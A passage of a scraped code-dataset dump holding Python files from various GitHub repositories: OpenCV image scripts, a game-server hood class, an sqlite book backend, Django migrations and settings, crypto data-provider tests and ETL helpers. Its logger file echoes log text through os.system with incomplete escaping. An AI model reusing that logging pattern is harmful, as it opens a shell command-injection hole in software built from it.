cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('Gray Scale Image', gray_median_frame)\ncv2.waitKey(0)\n\nwhile(ret_val):\n\n\t# Read the current frame\n\tret, frame = captured_video.read()\n\n\tif frame is not None:\n\t\t# Convert the current frame to grayscale\n\t\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\t\t# Calculate absolute difference of current frame and the median frame\n\t\tdiff_frame = cv2.absdiff(frame, gray_median_frame)\n\n\t\t# Threshold to binarize\n\t\tth, diff_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)\n\n\t\t# Display the final image\n\t\t# cv2.imshow('Temp Frames',frame)\n\t\tcv2.imshow('Difference Frames', diff_frame)\n\t\tcv2.waitKey(20)\ncv2.waitKey(0)\n# Release VideoCapture object \ncaptured_video.release()\n\n# Close all Windows\ncv2.destroyAllWindows()"},"size":{"kind":"number","value":2503,"string":"2,503"}}},{"rowIdx":862,"cells":{"max_stars_repo_path":{"kind":"string","value":"scripts/create_test_data_file_from_bt.py"},"max_stars_repo_name":{"kind":"string","value":"roger-/pyzephyr"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2022800"},"content":{"kind":"string","value":"\nimport serial\nimport time\nimport platform\nimport csv\n\nimport zephyr.protocol\n\ndef main():\n serial_port_dict = {\"Darwin\": \"/dev/cu.BHBHT001931-iSerialPort1\",\n \"Windows\": 23}\n \n serial_port = serial_port_dict[platform.system()]\n ser = serial.Serial(serial_port)\n \n callback = lambda x: None\n protocol = zephyr.protocol.BioHarnessProtocol(ser, callback, \"../test_data/120-second-bt-stream\")\n protocol.enable_periodic_packets()\n \n start_time = time.time()\n while time.time() < start_time + 120:\n protocol.read_and_handle_bytes(1)\n\n\nif __name__ == \"__main__\":\n main()\n"},"size":{"kind":"number","value":630,"string":"630"}}},{"rowIdx":863,"cells":{"max_stars_repo_path":{"kind":"string","value":"toontown/hood/GSHoodAI.py"},"max_stars_repo_name":{"kind":"string","value":"journeyfan/toontown-journey"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024433"},"content":{"kind":"string","value":"from toontown.classicchars import DistributedGoofySpeedwayAI\nfrom libpandadna import DNAGroup, DNAVisGroup\nfrom toontown.hood import HoodAI\nfrom toontown.hood import ZoneUtil\nfrom toontown.racing import RaceGlobals\nfrom toontown.racing.DistributedRacePadAI import DistributedRacePadAI\nfrom toontown.racing.DistributedStartingBlockAI import DistributedStartingBlockAI\nfrom toontown.racing.DistributedViewPadAI import DistributedViewPadAI\nfrom toontown.racing.DistributedStartingBlockAI import DistributedViewingBlockAI\nfrom toontown.toonbase import ToontownGlobals\n\n\nclass GSHoodAI(HoodAI.HoodAI):\n def __init__(self, air):\n HoodAI.HoodAI.__init__(self, air,\n ToontownGlobals.GoofySpeedway,\n ToontownGlobals.GoofySpeedway)\n\n self.racingPads = []\n self.viewingPads = []\n self.viewingBlocks = []\n self.startingBlocks = []\n self.leaderBoards = []\n self.classicChar = None\n\n self.startup()\n\n def startup(self):\n HoodAI.HoodAI.startup(self)\n\n self.createStartingBlocks()\n self.createLeaderBoards()\n self.cycleLeaderBoards()\n if simbase.config.GetBool('want-goofy', True):\n self.createClassicChar()\n\n def shutdown(self):\n HoodAI.HoodAI.shutdown(self)\n\n taskMgr.removeTasksMatching('leaderBoardSwitch')\n for board in self.leaderBoards:\n board.delete()\n del self.leaderBoards\n\n def findRacingPads(self, dnaGroup, zoneId, area, padType='racing_pad'):\n racingPads = []\n racingPadGroups = []\n if isinstance(dnaGroup, DNAGroup) and (padType in dnaGroup.getName()):\n racingPadGroups.append(dnaGroup)\n\n if padType == 'racing_pad':\n nameInfo = dnaGroup.getName().split('_')\n racingPad = DistributedRacePadAI(simbase.air)\n racingPad.setArea(zoneId)\n racingPad.nameType = nameInfo[3]\n racingPad.index = int(nameInfo[2])\n nextRaceInfo = RaceGlobals.getNextRaceInfo(-1, racingPad.nameType, racingPad.index)\n racingPad.setTrackInfo([nextRaceInfo[0], nextRaceInfo[1]])\n racingPad.generateWithRequired(zoneId)\n elif padType == 'viewing_pad':\n racingPad = DistributedViewPadAI(simbase.air)\n racingPad.setArea(zoneId)\n racingPad.generateWithRequired(zoneId)\n else:\n self.notify.error('Invalid racing pad type: ' + padType)\n\n racingPads.append(racingPad)\n elif isinstance(dnaGroup, DNAVisGroup):\n zoneId = ZoneUtil.getTrueZoneId(int(dnaGroup.getName().split(':')[0]), zoneId)\n for i in range(dnaGroup.getNumChildren()):\n (foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaGroup.at(i), zoneId, area, padType=padType)\n racingPads.extend(foundRacingPads)\n racingPadGroups.extend(foundRacingPadGroups)\n return (racingPads, racingPadGroups)\n\n def findStartingBlocks(self, dnaGroup, racePad):\n startingBlocks = []\n if isinstance(dnaGroup, DNAGroup) and ('starting_block' in dnaGroup.getName()):\n x, y, z = dnaGroup.getPos()\n h, p, r = dnaGroup.getHpr()\n if isinstance(racePad, DistributedRacePadAI):\n startingBlock = DistributedStartingBlockAI(simbase.air)\n elif isinstance(racePad, DistributedViewPadAI):\n startingBlock = DistributedViewingBlockAI(simbase.air)\n else:\n self.notify.error('Unknown starting block type.')\n startingBlock.setPosHpr(x, y, z, h, p, r)\n startingBlock.setPadDoId(racePad.doId)\n startingBlock.setPadLocationId(getattr(racePad, 'index', 0))\n startingBlock.generateWithRequired(racePad.zoneId)\n\n startingBlocks.append(startingBlock)\n for i in range(dnaGroup.getNumChildren()):\n foundStartingBlocks = self.findStartingBlocks(dnaGroup.at(i), racePad)\n startingBlocks.extend(foundStartingBlocks)\n return startingBlocks\n\n def createStartingBlocks(self):\n self.racingPads = []\n self.viewingPads = []\n racingPadGroups = []\n viewingPadGroups = []\n for zoneId in self.getZoneTable():\n dnaData = self.air.dnaDataMap.get(zoneId, None)\n zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)\n if dnaData.getName() == 'root':\n area = ZoneUtil.getCanonicalZoneId(zoneId)\n (foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='racing_pad')\n (foundViewingPads, foundViewingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='viewing_pad')\n self.racingPads.extend(foundRacingPads)\n racingPadGroups.extend(foundRacingPadGroups)\n self.viewingPads.extend(foundViewingPads)\n viewingPadGroups.extend(foundViewingPadGroups)\n self.startingBlocks = []\n for (dnaGroup, racePad) in zip(racingPadGroups, self.racingPads):\n foundStartingBlocks = self.findStartingBlocks(dnaGroup, racePad)\n self.startingBlocks.extend(foundStartingBlocks)\n for startingBlock in foundStartingBlocks:\n racePad.addStartingBlock(startingBlock)\n self.viewingBlocks = []\n for (dnaGroup, viewPad) in zip(viewingPadGroups, self.viewingPads):\n foundViewingBlocks = self.findStartingBlocks(dnaGroup, viewPad)\n self.viewingBlocks.extend(foundViewingBlocks)\n for viewingBlock in foundViewingBlocks:\n viewPad.addStartingBlock(viewingBlock)\n\n def findLeaderBoards(self, dnaData, zoneId):\n return [] # TODO\n\n def createLeaderBoards(self):\n self.leaderBoards = []\n dnaData = self.air.dnaDataMap[self.zoneId]\n if dnaData.getName() == 'root':\n self.leaderBoards = self.findLeaderBoards(dnaData, self.zoneId)\n for leaderBoard in self.leaderBoards:\n if not leaderBoard:\n continue\n if 'city' in leaderBoard.getName():\n leaderBoardType = 'city'\n elif 'stadium' in leaderBoard.getName():\n leaderBoardType = 'stadium'\n elif 'country' in leaderBoard.getName():\n leaderBoardType = 'country'\n for subscription in RaceGlobals.LBSubscription[leaderBoardType]:\n leaderBoard.subscribeTo(subscription)\n\n def cycleLeaderBoards(self, task=None):\n messenger.send('leaderBoardSwap-' + str(self.zoneId))\n taskMgr.doMethodLater(10, self.cycleLeaderBoards, 'leaderBoardSwitch')\n\n def createClassicChar(self):\n self.classicChar = DistributedGoofySpeedwayAI.DistributedGoofySpeedwayAI(self.air)\n self.classicChar.generateWithRequired(self.zoneId)\n self.classicChar.start()\n"},"size":{"kind":"number","value":7008,"string":"7,008"}}},{"rowIdx":864,"cells":{"max_stars_repo_path":{"kind":"string","value":"backend.py"},"max_stars_repo_name":{"kind":"string","value":"mohitroutela/library-management-system-using-tkinter"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023843"},"content":{"kind":"string","value":"import sqlite3 \ndef connect():\n\t'''it is used to connect to the database books'''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"CREATE TABLE IF NOT EXISTS book(id integer PRIMARY KEY,title text,author text,year text,isbn integer)\")\n\tconn.commit()\n\tconn.close()\ndef insert(title,author,year,isbn):\n\t''' it is used to inset into the database '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"INSERT INTO book values (Null,?,?,?,?)\",(title,author,year,isbn))\n\tconn.commit()\n\tconn.close()\n\ndef view():\n\t''' it is used to view all the enteries in the book table of a books database '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT * FROM book\")\n\trows=cur.fetchall()\n\tconn.close()\n\treturn rows\n\ndef search(title=\"\",author=\"\",year=\"\",isbn=\"\"):\n\t''' it is used to search the entries\n\t null string are passed so that user can select any one of them '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT * FROM book where title=? or author=? or year=? or isbn=?\",(title,author,year,isbn))\n\tconn.commit()\n\trows=cur.fetchall()\n\tconn.close()\n\treturn rows\n\ndef update(id,title,author,year,isbn):\n\t''' it updates the values according to the id selected in the user interface '''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"UPDATE book SET title=?,author=?,year=?,isbn=? where id=?\",(title,author,year,isbn,id))\n\tconn.commit()\n\tconn.close()\n\ndef delete(id):\n\t''' deletes according to the id selected'''\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"DELETE FROM book WHERE id=?\",(id,)) #(id,) commas has been used besides id so that it is passed as a tuple\n\tconn.commit()\n\tconn.close()\ndef delete_all():\n\tconn=sqlite3.connect(\"books.db\")\n\tcur=conn.cursor()\n\tcur.execute(\"DELETE FROM book\")\n\tconn.commit()\n\tconn.close()\n\n"},"size":{"kind":"number","value":1847,"string":"1,847"}}},{"rowIdx":865,"cells":{"max_stars_repo_path":{"kind":"string","value":"gpvdm_gui/gui/lasers.py"},"max_stars_repo_name":{"kind":"string","value":"roderickmackenzie/gpvdm"},"max_stars_count":{"kind":"number","value":12,"string":"12"},"id":{"kind":"string","value":"2022876"},"content":{"kind":"string","value":"#\n# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall\n# model for 1st, 2nd and 3rd generation solar cells.\n# Copyright (C) 2008-2022 r.. at googlemail.com\n# \n# https://www.gpvdm.com\n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License v2.0, as published by\n# the Free Software Foundation.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n# \n\n## @package lasers\n# Main laser editor window.\n#\n\nimport os\nimport webbrowser\nfrom tab import tab_class\nfrom icon_lib import icon_get\n\nimport i18n\n_ = i18n.language.gettext\n\n#qt\nfrom PyQt5.QtWidgets import QMainWindow, QTextEdit, QAction, QApplication\nfrom PyQt5.QtGui import QIcon, QPainter, QFont, QColor\nfrom PyQt5.QtCore import QSize, Qt\nfrom PyQt5.QtWidgets import QWidget,QSizePolicy,QVBoxLayout,QPushButton,QDialog,QFileDialog,QToolBar,QLabel,QComboBox, QTabWidget,QStatusBar,QMenuBar, QTabBar, QStylePainter, QStyleOptionTab,QStyle\n\n#window\nfrom gui_util import yes_no_dlg\nfrom gui_util import dlg_get_text\nfrom util import wrap_text\n\nfrom QWidgetSavePos import QWidgetSavePos\nfrom cal_path import get_sim_path\n\nfrom css import css_apply\n\nfrom experiment import experiment\n\nclass lasers(experiment):\n\n\n\tdef __init__(self,data=None):\n\t\texperiment.__init__(self,window_save_name=\"laser_editor\", window_title=_(\"Laser editor\"),name_of_tab_class=\"jvexperiment_tab\",json_search_path=\"gpvdm_data().lasers\")\n\t\tself.notebook.currentChanged.connect(self.switch_page)\n\t\t#self.ribbon.tb_save.setVisible(False)\n\t\tself.switch_page()\n\n\tdef switch_page(self):\n\t\ttab = self.notebook.currentWidget()\n\t\t#self.tb_lasers.update(tab.data)\n\n\n"},"size":{"kind":"number","value":2151,"string":"2,151"}}},{"rowIdx":866,"cells":{"max_stars_repo_path":{"kind":"string","value":"server/src/expandLogger.py"},"max_stars_repo_name":{"kind":"string","value":"leonard-thong/dlwlrat"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2024407"},"content":{"kind":"string","value":"# -*- coding:utf-8 -*-\n\"\"\"\n===========================================\n @author: lmy\n @time: 2020/8/11 5:54 PM\n @project: brat\n @file: expandLogger.py\n===========================================\n\"\"\"\nimport sys\nimport os\n\nEXCEPTION = \"\\n\\033[95mEXCEPTION: \"\nOKBLUE = \"\\n\\033[94m\"\nOKGREEN = \"\\n\\033[92m\"\nWARNING = \"\\033[93mWARNING: \"\nERROR = \"\\n\\033[91mERROR: \"\nENDC = \"\\033[0m\"\n\n\nclass Logger(object):\n # def __init__(self, file_path):\n # self.file_path = file_path\n # self.f_out = open(self.file_path, \"a\", encoding=\"utf8\")\n\n # def __del__(self):\n # self.f_out.close()\n\n # def log(self, content):\n # self.f_out.write(content)\n\n @staticmethod\n def print(content):\n os.system(\"echo \" + \"'\" + content.__str__().replace(' ', '\\ ').replace('(','\\(').replace(')','\\)').replace('&','\\&') + \"'\")\n\n def log_normal(self, log):\n self.print(OKGREEN + \"RUNNING LOG: \" + log.__str__() + ENDC)\n\n def log_warning(self, log):\n self.print(WARNING + log.__str__() + ENDC)\n\n def log_error(self, log):\n self.print(ERROR + log.__str__() + ENDC)\n\n def log_exception(self, log):\n self.print(EXCEPTION + log.__str__() + ENDC)\n\n def log_custom(self, style, log):\n self.print(style + log.__str__() + ENDC)\n\n\nif __name__ == \"__main__\":\n logger = Logger()\n logger.log_warning(\"THIS IS A TEST MESSAGE\")\n logger.log_normal(\"THIS IS A TEST MESSAGE\")\n logger.log_error(\"THIS IS A TEST MESSAGE\")\n"},"size":{"kind":"number","value":1485,"string":"1,485"}}},{"rowIdx":867,"cells":{"max_stars_repo_path":{"kind":"string","value":"demandCustomize/cloudPlatform/migrations/0004_auto_20170516_1716.py"},"max_stars_repo_name":{"kind":"string","value":"liushouyun/equipment"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024296"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Generated by Django 1.10.4 on 2017-05-16 17:16\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cloudPlatform', '0003_auto_20170512_1926'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='demandtemplate',\n name='StartMethodNode',\n field=models.IntegerField(default=0),\n ),\n migrations.AlterField(\n model_name='demandtemplatenode',\n name='DemandTemplate_DemandTemplateID',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='cloudPlatform.DemandTemplate'),\n ),\n ]\n"},"size":{"kind":"number","value":762,"string":"762"}}},{"rowIdx":868,"cells":{"max_stars_repo_path":{"kind":"string","value":"qf_lib_tests/integration_tests/data_providers/test_cryptocurrency_provider.py"},"max_stars_repo_name":{"kind":"string","value":"webclinic017/qf-lib"},"max_stars_count":{"kind":"number","value":198,"string":"198"},"id":{"kind":"string","value":"2024388"},"content":{"kind":"string","value":"# Copyright 2016-present CERN – European Organization for Nuclear Research\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nimport pandas as pd\n\nfrom qf_lib.common.enums.frequency import Frequency\nfrom qf_lib.common.enums.price_field import PriceField\nfrom qf_lib.common.tickers.tickers import CcyTicker\nfrom qf_lib.common.utils.dateutils.string_to_date import str_to_date\nfrom qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame\nfrom qf_lib.containers.dataframe.qf_dataframe import QFDataFrame\nfrom qf_lib.containers.qf_data_array import QFDataArray\nfrom qf_lib.containers.series.prices_series import PricesSeries\nfrom qf_lib.containers.series.qf_series import QFSeries\nfrom qf_lib.data_providers.cryptocurrency.cryptocurrency_data_provider import CryptoCurrencyDataProvider\n\n\n@unittest.skip(\"CryptoCurrencyDataProvider needs update\")\nclass TestCryptoCurrency(unittest.TestCase):\n START_DATE = str_to_date('2016-01-01')\n END_DATE = str_to_date('2017-02-02')\n SINGLE_FIELD = 'Close'\n MANY_FIELDS = ['Open', 'Volume', 'Close']\n\n SINGLE_TICKER = CcyTicker('Bitcoin')\n MANY_TICKERS = [CcyTicker('Bitcoin'), CcyTicker('Ethereum'), CcyTicker('Ripple')]\n NUM_OF_DATES = 399\n\n SINGLE_PRICE_FIELD = PriceField.Close\n MANY_PRICE_FIELDS = [PriceField.Close, PriceField.Open, PriceField.High]\n\n def setUp(self):\n self.cryptocurrency_provider = CryptoCurrencyDataProvider()\n\n # =========================== Test get_price method ==========================================================\n\n def test_price_single_ticker_single_field(self):\n # single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None\n data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.SINGLE_PRICE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n\n self.assertIsInstance(data, PricesSeries)\n self.assertEqual(len(data), self.NUM_OF_DATES)\n self.assertEqual(data.name, self.SINGLE_TICKER.as_string())\n\n def test_price_single_ticker_multiple_fields(self):\n # single ticker, many fields; can be the same as for single field???\n data = self.cryptocurrency_provider.get_price(tickers=self.SINGLE_TICKER, fields=self.MANY_PRICE_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n\n self.assertEqual(type(data), PricesDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_PRICE_FIELDS)))\n self.assertEqual(list(data.columns), self.MANY_PRICE_FIELDS)\n\n def test_price_multiple_tickers_single_field(self):\n data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.SINGLE_PRICE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n self.assertEqual(type(data), PricesDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS)))\n self.assertEqual(list(data.columns), self.MANY_TICKERS)\n\n def test_price_multiple_tickers_multiple_fields(self):\n # testing for single date (start_date and end_date are the same)\n data = self.cryptocurrency_provider.get_price(tickers=self.MANY_TICKERS, fields=self.MANY_PRICE_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE,\n frequency=Frequency.DAILY)\n\n self.assertEqual(type(data), QFDataArray)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_PRICE_FIELDS)))\n self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)\n self.assertEqual(list(data.tickers), self.MANY_TICKERS)\n self.assertEqual(list(data.fields), self.MANY_PRICE_FIELDS)\n\n # =========================== Test get_history method ==========================================================\n\n def test_historical_single_ticker_single_field(self):\n # single ticker, single field; end_date by default now, frequency by default DAILY, currency by default None\n data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.SINGLE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE)\n\n self.assertIsInstance(data, QFSeries)\n self.assertEqual(len(data), self.NUM_OF_DATES)\n self.assertEqual(data.name, self.SINGLE_TICKER.as_string())\n\n def test_historical_single_ticker_multiple_fields(self):\n # single ticker, many fields; can be the same as for single field???\n data = self.cryptocurrency_provider.get_history(tickers=self.SINGLE_TICKER, fields=self.MANY_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE)\n\n self.assertEqual(type(data), QFDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_FIELDS)))\n self.assertEqual(list(data.columns), self.MANY_FIELDS)\n\n def test_historical_multiple_tickers_single_field(self):\n data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.SINGLE_FIELD,\n start_date=self.START_DATE, end_date=self.END_DATE)\n\n self.assertEqual(type(data), QFDataFrame)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS)))\n self.assertEqual(list(data.columns), self.MANY_TICKERS)\n\n def test_historical_multiple_tickers_multiple_fields_one_date(self):\n # testing for single date (start_date and end_date are the same)\n data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,\n start_date=self.END_DATE, end_date=self.END_DATE)\n self.assertEqual(type(data), QFDataFrame)\n self.assertEqual(data.shape, (len(self.MANY_TICKERS), len(self.MANY_FIELDS)))\n self.assertEqual(list(data.index), self.MANY_TICKERS)\n self.assertEqual(list(data.columns), self.MANY_FIELDS)\n\n def test_historical_multiple_tickers_multiple_fields_many_dates(self):\n # testing for single date (start_date and end_date are the same)\n data = self.cryptocurrency_provider.get_history(tickers=self.MANY_TICKERS, fields=self.MANY_FIELDS,\n start_date=self.START_DATE, end_date=self.END_DATE)\n self.assertEqual(type(data), QFDataArray)\n self.assertEqual(data.shape, (self.NUM_OF_DATES, len(self.MANY_TICKERS), len(self.MANY_FIELDS)))\n self.assertIsInstance(data.dates.to_index(), pd.DatetimeIndex)\n self.assertEqual(list(data.tickers), self.MANY_TICKERS)\n self.assertEqual(list(data.fields), self.MANY_FIELDS)\n\n\nif __name__ == '__main__':\n unittest.main()\n"},"size":{"kind":"number","value":7828,"string":"7,828"}}},{"rowIdx":869,"cells":{"max_stars_repo_path":{"kind":"string","value":"python-package/test/plot/test_aes.py"},"max_stars_repo_name":{"kind":"string","value":"OLarionova-HORIS/lets-plot"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023098"},"content":{"kind":"string","value":"#\n# Copyright (c) 2019. JetBrains s.r.o.\n# Use of this source code is governed by the MIT license that can be found in the LICENSE file.\n#\nimport pytest\n\nimport lets_plot as gg\n\n\nclass TestWithListArgs:\n result_empty = {'x': None, 'y': None}\n result_xy = {'x': 'xVar', 'y': 'yVar'}\n\n @pytest.mark.parametrize('args,expected', [\n ([], result_empty),\n (['xVar', 'yVar'], result_xy),\n ])\n def test_aes(self, args, expected):\n spec = gg.aes(*args)\n assert spec.as_dict() == expected\n\n\nclass TestWithDictArgs:\n result_kwargs = {'x': 'xVar', 'y': 'yVar', 'size': 'sizeVar'}\n\n @pytest.mark.parametrize('args,expected', [\n (result_kwargs, result_kwargs),\n ])\n def test_aes(self, args, expected):\n spec = gg.aes(**args)\n assert spec.as_dict() == expected\n"},"size":{"kind":"number","value":822,"string":"822"}}},{"rowIdx":870,"cells":{"max_stars_repo_path":{"kind":"string","value":"pytest_django_test/settings_sqlite_file.py"},"max_stars_repo_name":{"kind":"string","value":"lendingloop/pytest-django"},"max_stars_count":{"kind":"number","value":5079,"string":"5,079"},"id":{"kind":"string","value":"2022852"},"content":{"kind":"string","value":"import tempfile\n\nfrom .settings_base import * # noqa: F401 F403\n\n# This is a SQLite configuration, which uses a file based database for\n# tests (via setting TEST_NAME / TEST['NAME']).\n\n# The name as expected / used by Django/pytest_django (tests/db_helpers.py).\n_fd, _filename = tempfile.mkstemp(prefix=\"test_\")\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \"/pytest_django_should_never_get_accessed\",\n \"TEST\": {\"NAME\": _filename},\n }\n}\n"},"size":{"kind":"number","value":498,"string":"498"}}},{"rowIdx":871,"cells":{"max_stars_repo_path":{"kind":"string","value":"automated_correction_module/word_seg_try.py"},"max_stars_repo_name":{"kind":"string","value":"anaghrao-99/Digital-Portal-for-Schools"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024096"},"content":{"kind":"string","value":"#grayscale\nimport numpy as np\nimport cv2\n\nimport imutils\nfrom imutils import contours\n\nimport sys \nimport subprocess\nimport os\nfrom pathlib import Path \n\nfilename_input = sys.argv[1]\n\ndef erode_image(filename):\n \n img = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\n\n # increase contrast\n pxmin = np.min(img)\n pxmax = np.max(img)\n imgContrast = (img - pxmin) / (pxmax - pxmin) * 255\n\n # increase line width\n kernel = np.ones((4, 4), np.uint8)\n imgMorph = cv2.erode(imgContrast, kernel, iterations = 2)\n\n # write\n cv2.imwrite(filename, imgMorph)\n\n\n\ndef get_contour_precedence(contour, cols):\n origin = cv2.boundingRect(contour)\n return origin[1] * cols + origin[0]\n\n\n\n\nimage = cv2.imread(filename_input)\n\n# image = cv2.imread(filename)\n\n\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n# cv2.imshow('gray',gray)\n# cv2.waitKey(0)\n\n#binary\nret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)\n\n\n#dilation\nkernel = np.ones((5, 100), np.uint8)\n\n\nimg_dilation = cv2.dilate(thresh, kernel, iterations=5)\n\n\n#find contours im2\nctrs, hier = cv2.findContours(img_dilation.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n\n\n#sort contours\n# sorted_ctrs = sorted(ctrs, key=lambda ctr:get_contour_precedence(ctr, img_dilation.shape[1]))\nfor ctr in ctrs :\n\tx, y, w, h = cv2.boundingRect(ctr)\n\n\nsorted_ctrs = sorted(ctrs, key=lambda ctr: get_contour_precedence(ctr, img_dilation.shape[1]))\n\n# sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.boundingRect(ctr)[0] + cv2.boundingRect(ctr)[1] * image.shape[1] )\npath = os.path.abspath(os.getcwd()) + '/out_test/'\nif(os.path.exists(path)):\n\n for f in Path(path).glob('*.png'):\n f.unlink()\n\n\nfor i, ctr in enumerate(sorted_ctrs):\n # Get bounding box\n\n x, y, w, h = cv2.boundingRect(ctr)\n\n # Getting ROI\n roi = image[y:y+h, x:x+w]\n\n # show ROI\n #print('segment no:' + str(i))\n # cv2.imshow('segment no:'+str(i),roi)\n string = 'out_test/'\n\n string+= str(i)\n string += '.png'\n # initial_directory = os.path.abspath(os.getcwd())\n\n cv2.imwrite(string, roi)\n # erode_image(string)\n # cv2.imshow(roi)\n cv2.rectangle( image,(x,y),( x + w, y + h ),(90,0,255),2)\n # cv2.waitKey(0)\n\n\n\n# pipe = subprocess.check_call([\"python\", filename])\n\nprint(\"Splitting into lines is over\")\n\n"},"size":{"kind":"number","value":2296,"string":"2,296"}}},{"rowIdx":872,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/providers/api/modules/etlMods.py"},"max_stars_repo_name":{"kind":"string","value":"9LKQ7ZLC82/cccatalog"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024500"},"content":{"kind":"string","value":"import logging\nimport os\nimport re\nimport requests\nimport time\nimport json\nimport argparse\nimport random\nfrom datetime import datetime, timedelta\n\nPATH = os.environ['OUTPUT_DIR']\n\ndef writeToFile(_data, _name):\n outputFile = '{}{}'.format(PATH, _name)\n\n if len(_data) < 1:\n return None\n\n logging.info('Writing to file => {}'.format(outputFile))\n\n with open(outputFile, 'a') as fh:\n for line in _data:\n if line:\n fh.write('\\t'.join(line) + '\\n')\n\n\ndef sanitizeString(_data):\n if _data is None:\n return ''\n\n _data = _data.strip()\n _data = _data.replace('\"', \"'\")\n _data = re.sub(r'\\n|\\r', ' ', _data)\n\n return re.sub(r'\\s+', ' ', _data)\n\n\ndef delayProcessing(_startTime, _maxDelay):\n minDelay = 1.0\n\n #subtract time elapsed from the requested delay\n elapsed = float(time.time()) - float(_startTime)\n delayInterval = round(_maxDelay - elapsed, 3)\n waitTime = max(minDelay, delayInterval) #time delay between requests.\n\n logging.info('Time delay: {} second(s)'.format(waitTime))\n time.sleep(waitTime)\n\n\ndef requestContent(_url):\n logging.info('Processing request: {}'.format(_url))\n\n try:\n response = requests.get(_url)\n\n if response.status_code == requests.codes.ok:\n return response.json()\n else:\n logging.warning('Unable to request URL: {}. Status code: {}'.format(url, response.status_code))\n return None\n\n except Exception as e:\n logging.error('There was an error with the request.')\n logging.info('{}: {}'.format(type(e).__name__, e))\n return None\n"},"size":{"kind":"number","value":1643,"string":"1,643"}}},{"rowIdx":873,"cells":{"max_stars_repo_path":{"kind":"string","value":"backend/api/serializers/model_year_report_make.py"},"max_stars_repo_name":{"kind":"string","value":"kuanfandevops/zeva"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023115"},"content":{"kind":"string","value":"from rest_framework.serializers import ModelSerializer\n\nfrom api.models.model_year_report_make import ModelYearReportMake\n\n\nclass ModelYearReportMakeSerializer(ModelSerializer):\n class 